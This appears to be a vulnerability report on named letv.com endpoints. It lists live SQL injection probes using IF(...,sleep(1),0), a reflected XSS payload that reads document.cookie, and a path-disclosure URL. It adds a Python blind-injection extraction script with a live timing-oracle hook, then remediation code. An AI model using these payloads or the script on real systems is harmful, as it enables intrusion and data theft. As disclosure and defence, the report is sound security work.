Injection point (parameter id):
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702

Reflected XSS (the callback parameter is echoed into the JSONP response without encoding):
http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20onerror=alert(document.cookie)%3E&

Absolute path disclosure (PHP notices are shown to the client):
http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username=
Response: Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11

Test procedure

The id value goes into the SQL query without quoting or validation, so a MySQL IF(..., sleep(1), 0) expression works as a time-based blind oracle: the response is delayed by about one second only when the condition is true.

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702

From this the length of the current database connection user (user() returns name@host) can be inferred to be 23.

I only guessed the first character: its ASCII code is 50, the letter "2":
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)--&_=1408792945702

The user is not root; not exploited further.
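Worked example, added here and not part of the original report: it generalizes the report's single equality probe (ascii(mid(user(),1,1))=50) into a full recovery of user() by binary search, first over the length and then over each character code, which costs about 7 probes per character instead of up to 95. The HTTP layer is abstracted behind an oracle that answers true/false for one SQL condition. FAKE_DB_USER and simulated_oracle are constructed stand-ins for the vulnerable endpoint so the script runs offline (the report only reveals a length of 23 and a leading "2"; the rest of the value is assumed); make_timing_oracle shows how a real request function would be plugged in, measuring the delay the sleep(1) branch introduces.

```python
import re
import time
from typing import Callable

# Constructed stand-in for the database user; the report only reveals a length
# of 23 and a first character "2", so this value is an assumption.
FAKE_DB_USER = "2014joyearcar@localhost"

# The two condition shapes this script sends (the report used the same functions).
COND_LEN = re.compile(r"^length\(user\(\)\)>(\d+)$")
COND_CHR = re.compile(r"^ascii\(mid\(user\(\),(\d+),1\)\)>(\d+)$")


def injected_id(condition: str, delay: float = 1) -> str:
    """Build the id value as sent: MySQL IF() stalls only when condition holds."""
    return f"if({condition},sleep({delay}),0)"


def simulated_oracle(condition: str) -> bool:
    """Offline emulation of the vulnerable endpoint: return the boolean the real
    server would leak through its response time, without actually sleeping."""
    m = COND_LEN.match(condition)
    if m:
        return len(FAKE_DB_USER) > int(m.group(1))
    m = COND_CHR.match(condition)
    if m:
        pos, n = int(m.group(1)), int(m.group(2))
        # mid() past the end of the string yields '' and ascii('') is 0 in MySQL
        code = ord(FAKE_DB_USER[pos - 1]) if pos <= len(FAKE_DB_USER) else 0
        return code > n
    raise ValueError(f"unsupported condition: {condition}")


def make_timing_oracle(send: Callable[[str], None], delay: float = 1.0,
                       slack: float = 0.2) -> Callable[[str], bool]:
    """Turn a request function into a true/false oracle based on elapsed time.
    `send` receives the injected id value and performs the HTTP request; a
    response slower than delay - slack is taken as 'condition true'."""
    def oracle(condition: str) -> bool:
        start = time.monotonic()
        send(injected_id(condition, delay))
        return time.monotonic() - start >= delay - slack
    return oracle


def first_false(pred: Callable[[int], bool], lo: int, hi: int) -> int:
    """Smallest x in [lo, hi] with pred(x) False. pred must be monotone:
    True for every smaller x, False for every larger one. If pred never
    turns False within the range, hi is returned."""
    while lo < hi:
        mid = (lo + hi) // 2
        if pred(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_user(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Recover user(): length first, then one ASCII code per position."""
    # length > n is True exactly for n < length, so the first False is the length
    length = first_false(lambda n: oracle(f"length(user())>{n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = first_false(lambda n, p=pos: oracle(f"ascii(mid(user(),{p},1))>{n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print(injected_id("length(user())>22"))   # the report's first probe
    print(extract_user(simulated_oracle))      # recovers FAKE_DB_USER offline
```

Against a live target the timing oracle should repeat each probe or raise the sleep value when network jitter approaches the chosen delay; a single false reading corrupts the binary search for that character.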
Fix: resolve the SQL injection (validate id as an integer and bind it with a prepared statement); restrict or encode the callback parameter so it cannot carry markup; do not display detailed error messages (disable display_errors in production and log them server-side instead).
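Added example showing the three fixes together in one handler. This is not letv's code: it is written in Python with an in-memory sqlite3 table as a constructed stand-in for the PHP/MySQL votenum.php, and the table contents are made up. It rejects the report's XSS payload and SQL probe with a 400 instead of echoing them, binds the id as a parameter, and returns a generic message on database errors rather than a path-revealing notice.

```python
import json
import re
import sqlite3

# A JSONP callback must be a JavaScript identifier, optionally dotted
# (jQuery generates names like jQuery171017738118954002857_1408792927555).
# Anything else, including "callback__<img src=aaaa onerror=...>", is rejected
# instead of being written into the response body.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
ID_RE = re.compile(r"^\d{1,18}$")   # id is a plain integer, nothing else


def valid_callback(name: str) -> bool:
    return len(name) <= 128 and CALLBACK_RE.fullmatch(name) is not None


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the votes table (the real backend is MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE votes (id INTEGER PRIMARY KEY, num INTEGER NOT NULL)")
    conn.executemany("INSERT INTO votes VALUES (?, ?)", [(1, 1203), (2, 877)])
    return conn


def votenum(conn: sqlite3.Connection, params: dict) -> tuple:
    """Hardened equivalent of votenum.php; returns (status, content_type, body)."""
    callback = params.get("callback", "")
    if not valid_callback(callback):
        return 400, "application/json", json.dumps({"error": "invalid callback"})

    raw_id = params.get("id", "")
    if not ID_RE.fullmatch(raw_id):
        # "if(length(user())>22,sleep(1),0)" never reaches the database
        return 400, "application/json", json.dumps({"error": "invalid id"})
    vote_id = int(raw_id)

    try:
        # Bound parameter: the value can never be parsed as SQL
        row = conn.execute("SELECT num FROM votes WHERE id = ?", (vote_id,)).fetchone()
    except sqlite3.Error:
        # Log the real error server-side; never send paths or SQL text to the client
        return 500, "application/json", json.dumps({"error": "internal error"})
    if row is None:
        return 404, "application/json", json.dumps({"error": "not found"})

    payload = json.dumps({"id": vote_id, "num": row[0]})
    # Leading comment prevents the response being treated as another file type
    # (Rosetta Flash); the script content type keeps browsers from rendering it as HTML.
    return 200, "application/javascript; charset=utf-8", f"/**/{callback}({payload});"


if __name__ == "__main__":
    db = make_demo_db()
    print(votenum(db, {"callback": "jQuery171017738118954002857_1408792927555", "id": "1"}))
    print(votenum(db, {"callback": "callback__<img src=aaaa onerror=alert(document.cookie)>", "id": "1"}))
    print(votenum(db, {"callback": "cb", "id": "if(length(user())>22,sleep(1),0)"}))
```

In PHP the same shape is a preg_match() whitelist on $_GET['callback'], a PDO prepared statement with the integer bound, and display_errors=Off with log_errors=On in php.ini.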